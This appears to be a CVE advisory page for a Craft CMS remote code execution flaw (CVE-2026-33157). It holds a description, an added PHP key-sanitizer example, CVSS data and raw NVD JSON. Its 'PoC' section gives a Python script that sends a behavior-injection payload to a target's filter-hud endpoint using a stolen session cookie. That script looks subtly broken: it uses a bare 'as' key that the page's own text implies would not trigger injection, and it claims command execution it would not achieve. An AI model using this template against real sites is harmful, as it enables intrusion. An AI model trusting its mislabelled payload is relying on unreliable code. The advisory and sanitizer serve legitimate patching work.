Security Vulnerability Report
CVE-2026-33157 CVSS 7.2 HIGH

CVE-2026-33157

Published: 2026-03-24 18:16:10
Last Modified: 2026-03-26 17:08:14

Description

Craft CMS is a content management system (CMS). From version 5.6.0 to before version 5.9.13, a Remote Code Execution (RCE) vulnerability exists in Craft CMS that can be exploited by any authenticated user with control panel access. This is a bypass of a previous fix. The existing patches add cleanseConfig() to assembleLayoutFromPost() and to various FieldsController actions to strip Yii2 behavior/event injection keys ("as"- and "on"-prefixed keys). However, the fieldLayouts parameter in ElementIndexesController::actionFilterHud() is passed directly to FieldLayout::createFromConfig() without any sanitization, enabling the same behavior injection attack chain. This issue has been patched in version 5.9.13.
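The root cause described above is that Yii2 treats config keys beginning with "as " (attach a behavior) and "on " (attach an event handler) as instructions rather than data, so any request-controlled array that reaches a createFromConfig()-style constructor must have those keys removed first, at every entry point. The following is an added illustration of such a sanitizer, written here for this report; it is not Craft's own cleanseConfig() and the function name, the sample layout array and the key names in it are constructed for the example.

```php
<?php
// Added example (not Craft CMS or Yii2 code): recursively drop the config keys
// that Yii2's Component::__set() interprets as behavior attachments ("as <name>")
// and event handlers ("on <name>") before an untrusted array is passed on to
// Yii::createObject() / Yii::configure() or a createFromConfig() helper.

/**
 * Return $config with every "as ..." / "on ..." key removed at any depth.
 * The check is deliberately broader than Yii2's own (which is a case-sensitive
 * "as " / "on " prefix test): leading whitespace is trimmed and the comparison
 * is case-insensitive, so a sanitizer never accepts a key the framework might.
 */
function stripInjectionKeys(array $config): array
{
    $clean = [];
    foreach ($config as $key => $value) {
        if (is_string($key)) {
            $normalized = strtolower(ltrim($key));
            if (str_starts_with($normalized, 'as ') || str_starts_with($normalized, 'on ')) {
                continue; // behavior / event injection key: drop it entirely
            }
        }
        // Recurse so nested tabs/elements cannot smuggle the same keys one level down.
        $clean[$key] = is_array($value) ? stripInjectionKeys($value) : $value;
    }
    return $clean;
}

// Constructed sample request body (hypothetical, not from the advisory): a
// field-layout config carrying legitimate keys plus two injection keys, one of
// them nested inside a tab definition.
$untrusted = [
    'uid'  => 'example-layout',
    'tabs' => [
        ['name' => 'Content', 'as hook' => ['class' => 'ExampleBehavior']],
    ],
    'on init' => 'example_callable',
];

$safe = stripInjectionKeys($untrusted);

assert(!array_key_exists('on init', $safe));
assert(!array_key_exists('as hook', $safe['tabs'][0]));
assert($safe['tabs'][0]['name'] === 'Content');

// Only $safe would then be handed to the layout constructor, e.g.
// FieldLayout::createFromConfig($safe), never the raw request parameter.
```

Because this CVE is itself a bypass of an earlier deny-list fix that missed one call site, the practical lesson for code review is to apply the sanitization (or, better, an allowlist of the keys a layout config may legitimately contain) inside the constructor that consumes the array, rather than at each controller action that happens to call it.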

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* - VULNERABLE
Craft CMS >= 5.6.0, < 5.9.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Exploit concept for CVE-2026-33157
# Target: Craft CMS < 5.9.13
# Requirement: Authenticated Session
target_url = "https://target-craft.com/admin/element-indexes/filter-hud"
session_cookie = "{PHPSESSID_COOKIE_VALUE}"

# Payload structure demonstrating behavior injection via 'as' key
payload = {
    "fieldLayouts": {
        "uid": "test-layout",
        "as": {
            "class": "yii\\base\\Object",  # Malicious class instantiation
            "__construct()": [
                ["whoami"]  # Arbitrary command argument
            ]
        }
    }
}

headers = {
    "Cookie": f"PHPSESSID={session_cookie}",
    "Content-Type": "application/json"
}

response = requests.post(target_url, json=payload, headers=headers)
print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")
```

References

https://github.com/craftcms/cms/commit/97e90b4bdee369c1af3ca77a77531132df240e4e (Patch)
https://github.com/craftcms/cms/releases/tag/5.9.13 (Release Notes)
https://github.com/craftcms/cms/security/advisories/GHSA-2fph-6v5w-89hh (Exploit, Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-33157", "sourceIdentifier": "[email protected]", "published": "2026-03-24T18:16:09.590", "lastModified": "2026-03-26T17:08:13.740", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Craft CMS is a content management system (CMS). From version 5.6.0 to before version 5.9.13, a Remote Code Execution (RCE) vulnerability exists in Craft CMS, it can be exploited by any authenticated user with control panel access. This is a bypass of a previous fix. The existing patches add cleanseConfig() to assembleLayoutFromPost() and various FieldsController actions to strip Yii2 behavior/event injection keys (\"as\" and \"on\" prefixed keys). However, the fieldLayouts parameter in ElementIndexesController::actionFilterHud() is passed directly to FieldLayout::createFromConfig() without any sanitization, enabling the same behavior injection attack chain. This issue has been patched in version 5.9.13."}, {"lang": "es", "value": "Craft CMS es un sistema de gestión de contenido (CMS). Desde la versión 5.6.0 hasta antes de la versión 5.9.13, existe una vulnerabilidad de Ejecución Remota de Código (RCE) en Craft CMS, que puede ser explotada por cualquier usuario autenticado con acceso al panel de control. Esto es una elusión de una corrección anterior. Los parches existentes añaden cleanseConfig() a assembleLayoutFromPost() y a varias acciones de FieldsController para eliminar las claves de inyección de comportamiento/evento de Yii2 ('claves prefijadas con 'as' y 'on'). Sin embargo, el parámetro fieldLayouts en ElementIndexesController::actionFilterHud() se pasa directamente a FieldLayout::createFromConfig() sin ninguna sanitización, lo que permite la misma cadena de ataque de inyección de comportamiento. Este problema ha sido parcheado en la versión 5.9.13."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-470"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.6.0", "versionEndExcluding": "5.9.13", "matchCriteriaId": "C315EDAE-A519-409A-873A-E6D840C98A82"}]}]}], "references": [{"url": "https://github.com/craftcms/cms/commit/97e90b4bdee369c1af3ca77a77531132df240e4e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/craftcms/cms/releases/tag/5.9.13", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/craftcms/cms/security/advisories/GHSA-2fph-6v5w-89hh", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
```